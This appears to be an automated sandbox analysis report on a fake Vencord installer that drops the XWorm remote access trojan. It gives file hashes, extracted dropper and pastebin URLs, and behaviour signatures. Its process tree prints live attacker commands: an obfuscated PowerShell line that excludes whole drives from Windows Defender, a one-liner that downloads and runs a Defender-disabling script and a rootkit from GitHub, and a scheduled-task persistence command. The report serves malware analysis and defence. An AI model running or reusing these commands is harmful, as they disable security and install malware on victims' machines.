Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    06/03/2025, 17:20

General

  • Target

    VencordInstaller2.exe

  • Size

    9.9MB

  • MD5

    c374d1675742dec803bc013c5069711b

  • SHA1

    ce53bdc502f1b9dfe6721e9fe3853029d31b8650

  • SHA256

    3293c4ae19d9c0fe95f15a8f65c08cc8d47d47d0a765ac024b5d5db0d2de9ed2

  • SHA512

    77d69bb193808b81038e9c4ad14920dc1e87ffb21a102b6a3bbe0876581275d77bfe3c9466aa9b8c903bdeca3b90911eb5edfed912597ec76cb4e03a17698044

  • SSDEEP

    196608:J95OFJg0DC/xTYt34Z+UWNhwiH0mQoAqOPmhMxA4jZzbLNNNj/ztmU:X5OFJxOBdIUWNKiH0NzqO9xAKbNj/ztF

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes
  • Install_directory

    %port%

  • install_file

    svchost.exe

  • pastebin_url

    https://pastebin.com/raw/J42c6s7r

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 40 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\VencordInstaller2.exe
    "C:\Users\Admin\AppData\Local\Temp\VencordInstaller2.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAdABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAZAB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAegBrACMAPgA="
      (decoded from the UTF-16LE base64 above: <#stk#>Add-MpPreference <#gdu#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dkj#> -Force <#yzk#> ; the <#...#> block comments are junk inserted for obfuscation, so the effective command is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the user profile and the entire system drive from Windows Defender scanning)
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1396
    • C:\Windows\Credential Guard & VBS Key Isolation.exe
      "C:\Windows\Credential Guard & VBS Key Isolation.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2840
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Credential Guard & VBS Key Isolation" /tr "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2660
    • C:\Users\Admin\AppData\Local\VencordInstaller (1).exe
      "C:\Users\Admin\AppData\Local\VencordInstaller (1).exe"
      2⤵
      • Executes dropped EXE
      PID:2800
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {91706C2F-587A-42E1-A48F-1128C9D44E1D} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
    1⤵
      PID:2972

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S4TNITZRTIMIH8TFV15B.temp

      Filesize

      7KB

      MD5

      c4d59650ce027530ce036e31662de552

      SHA1

      62de9459aa112b9b9246044baa60664a9a564608

      SHA256

      bc2feebe957db9b77201310ed4e0c9900293b2e60b9cd762846440a37befc098

      SHA512

      e2431899e6fd53511edc67b9eaaf067b05b96f0206963a58882f0a7d8323191c8021c4ef1c6733a478501db784f6eac0da6f5d15e210bd69c9cbc7a2b800df81

    • C:\Windows\Credential Guard & VBS Key Isolation.exe

      Filesize

      55KB

      MD5

      dac20ddb2cfb3cb89ce5bcd907c796df

      SHA1

      84ec40d9a683ed62a25f8e1e570b0a2ee3987af0

      SHA256

      9a727d5cfc4c67cb0d3c0f8195087042fd04b83bb29cbe0c0439a4094a2adfc7

      SHA512

      5a3199f76bc18eb20a1e9e7d0bdbadbff3deaa06ec00b3aee33360f1497cc22ae0bc1a125aeaadcef1647c5f03cb386bfbc62375ca5e70ac57c01168043c8762

    • \Users\Admin\AppData\Local\VencordInstaller (1).exe

      Filesize

      9.9MB

      MD5

      1b8ee61ddcfd1d425821d76ea54ca829

      SHA1

      f8daf2bea3d4a6bfc99455d69c3754054de3baa5

      SHA256

      dc0826657a005009f43bdc3a0933d08352f8b22b2b9b961697a2db6e9913e871

      SHA512

      75ba16ddc75564e84f5d248326908065942ad50631ec30d7952069caee15b8c5411a8802d25d38e9d80e042f1dde97a0326f4ab4f1c90f8e4b81396ca69c229a

    • memory/2800-13-0x000000013FCB0000-0x0000000140F29000-memory.dmp

      Filesize

      18.5MB

    • memory/2840-18-0x000000001B320000-0x000000001B602000-memory.dmp

      Filesize

      2.9MB

    • memory/2840-19-0x00000000024E0000-0x00000000024E8000-memory.dmp

      Filesize

      32KB

    • memory/2860-9-0x00000000000F0000-0x0000000000104000-memory.dmp

      Filesize

      80KB